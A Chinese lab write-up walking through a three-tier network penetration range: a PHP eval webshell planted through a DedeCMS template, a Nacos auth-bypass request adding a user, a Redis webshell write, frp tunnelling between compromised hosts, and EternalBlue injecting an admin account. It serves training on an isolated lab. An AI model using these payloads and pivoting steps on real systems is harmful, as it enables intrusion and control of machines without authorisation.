【复现】州弟三层网络渗透及综合渗透
靶场搭建
具体搭建直接看官方的视频就行
三层网络渗透及综合渗透教程-环境搭建_哔哩哔哩_bilibili
环境配置
环境及所需工具下载地址:https://pan.quark.cn/s/9d68fc9eea63
动态更新环境地址:https://pan.quark.cn/s/a096cebb578e
- 网盘可能由于波动,导致环境丢失,会在此地址动态更新下载链接
DMZ服务器账号密码:administrator/P@ssw0rd1
二层服务器账号密码:dmz/P@ssw0rd2
三层服务器账号密码:pro/P@ssw0rd3
以上信息在视频和描述中已说明请确保安装盘硬盘容量大于15G
任务要求
拿下DMZ区设备后获取DMZ区administrator桌面下flag文件值
拿下二层网络设备获取某服务内的flag
拿下二层网络设备后获取根目录下flag文件值
拿下三层网络设备后获取pro用户桌面下的flag文件值
改动
VMnet2和VMnet3还是按作者的来设置(我这里看错了所以和州弟的不一样,其实改成什么都行),把作者的VMnet4网卡换成我个人的VMnet8网卡,因为我不想改我kali的IP了
| 主机 | IP | 网卡一 | 网卡二 |
|---|---|---|---|
| kali | 192.168.213.128 | VMnet8 192.168.213.0/24 | |
| DMZ Windows |
192.168.213.129 192.168.59.128 |
VMnet8 192.168.213.0/24 | VMnet3 192.168.59.0/24 |
| 二层 Linux |
192.168.59.129 192.168.37.128 |
VMnet3 192.168.59.0/24 | VMnet2 192.168.37.0/24 |
| 三层 Windows | 192.168.37.129 | VMnet2 192.168.37.0/24 |
靶场实战
DMZ
Web渗透
主机发现
1 | 192.168.213.129 |
fscan扫描
1 | 192.168.213.1:7680 open |
1 | include/downmix.inc.php |
目录扫描
GetShell
账号密码登录 admin/admin
模板—–>默认模板管理—–>新建模板
在内容中输入后门代码
1 | <?php @eval($_POST[123]);?> |
生成—–>更新主页HTML—–>浏览
选择新建的模板
后缀改为php
选择生成静态
点击更新主页HTML
点击浏览
没有报错
所以后门地址为:
http://192.168.213.129:8080/newtpl.php
使用后门工具进行连接,这里我实际上传的是哥斯拉,文本写的是一句话木马,大家分辨清楚哈
拿到flag_1
第一个任务是拿下DMZ区设备后获取DMZ区administrator桌面下flag文件值
1 | flag{78477a738c06620b872421af357d2cd5} |
后渗透
信息收集
发现不存在域环境,且存在双网卡,不出网
1 | 192.168.213.129/24 |
fscan扫描
扫一扫第二个网段
1 | fscan.exe -h 192.168.59.128/24 |
显示存在认证绕过,待会儿看看。还有6379端口开放了,说不定存在redis未授权哈,还有22端口,看来这台主机是Linux了
上线CS
为方便针对第二天靶机,上线CS
成功上线
代理隧道
成功访问到
http://192.168.59.129:8848/nacos/#/login
kali挂代理
成功访问到
二层
Web渗透
1、在url处添加访问一下网址即可查看到用户列表
1 | /nacos/v1/auth/users?pageNo=1&pageSize=100 |
2、访问以下链接并使用burp抓包,然后把get请求改为post,把修改User-Agent头改为Nacos-Server
1 | http://192.168.59.129:8848/nacos/v1/auth/users |
发现缺少参数
3、构造数据包添加一个demo用户,然后发送POST请求,返回为200,表示创建用户成功
1 | username=demo&password=demo |
4、回到登录界面,使用添加的账号密码进行登录,可以看到登录成功
拿到flag_2
1 | flag{7b4b73d7e9ef1c5959efbb820de2495e} |
还有一个password,不知道是ssh密码还是redis的密码,
redis写入webshell
尝试登录
寻找web目录
80端口进行目录扫描
挂一层代理连接蚁剑
拿到flag_3
在根目录下 /flag
1 | flag{you_look_look} |
后渗透
信息收集
发现不存在域环境,且存在双网卡,不出网
1 | 192.168.59.129/24 |
fscan扫描
1 | fscan -h 192.168.37.128/24 |
现在的代理是第一层的代理,流量可达第二层,拿下第二层的主机后可查看第三层的网络信息
因为第一层的代理访问不到第三层的主机,所以现在就准备第二层代理,这样流量就可达第三层,拿下第三层主机
在DMZ主机上传frpc
配置文件
1 | [common] |
执行
1 | frpc.exe -c froc.toml |
这样就将和kali做好了代理,代理端口是4455,而这个local_ip和local_port是怎么回事儿呢吧,就是将本地的6000端口转发到一层代理的4455端口上,而这个6000端口将是下文要做的二层代理端口,且这个local_ip呢是和二层主机有共同C段的IP
在DMZ主机上传frps
DMZ主机是windows,上传frps.exe
配置文件
1 | bindPort = 7000 |
1 | frps.exe -c frps.toml |
启动之后可以看到DMZ主机已经在监听7000端口了
在二层主机上传frpc
二层主机是Linux,上传frpc
配置文件
server_addr填二层主机能访问到DMZ主机的IP,也就是他俩共同网段的192.168.59.0/24的IP
remotePort改为DMZ主机要代理的端口6000,就是上文提到的
1 | [common] |
赋予执行权限,执行
1 | frpc -c frpc.toml |
启动之后可以上帝视角看到DMZ主机的7000端口已经和二层主机连接上了,同时6000端口也开始监听了
上帝视角看第二层主机也是一样的,已经和DMZ主机建立了连接
现在已经做好了代理,配置一下kali的全局代理,只要第一层的代理端口就行,因为我们再一层和二层直接已经做了端口转发了,现在已经能以第二层主机的身份和第三层主机进行交互了
三层
Web渗透
当前已经知道第三层主机存在永恒之蓝漏洞了,现在看能不能将kali的msf挂上代理,直接拿exp去打第三层主机,很遗憾我的msf一直报超时
不然可以试着用下边几个模块打一打
后渗透
本地挂上代理
用Proxifier挂好第一层代理
规则就把二层和三层的C段写进去
然后用ABC_123的工具来打,扫出来了永恒之蓝
可以看到该工具的流量是从代理里边走的
选择永恒之蓝
注入dll文件
会注入一个新的用户名admin01
密码是:Config123!@#
可以用上帝视角看一下是否注入成功
远程连接三层靶机
拿到flag_4
来到pro用户的桌面
参考文章
【漏洞复现-dedecms-文件上传】vulfocus/dedecms-cve_2019_8933_dedecms 漏洞-CSDN博客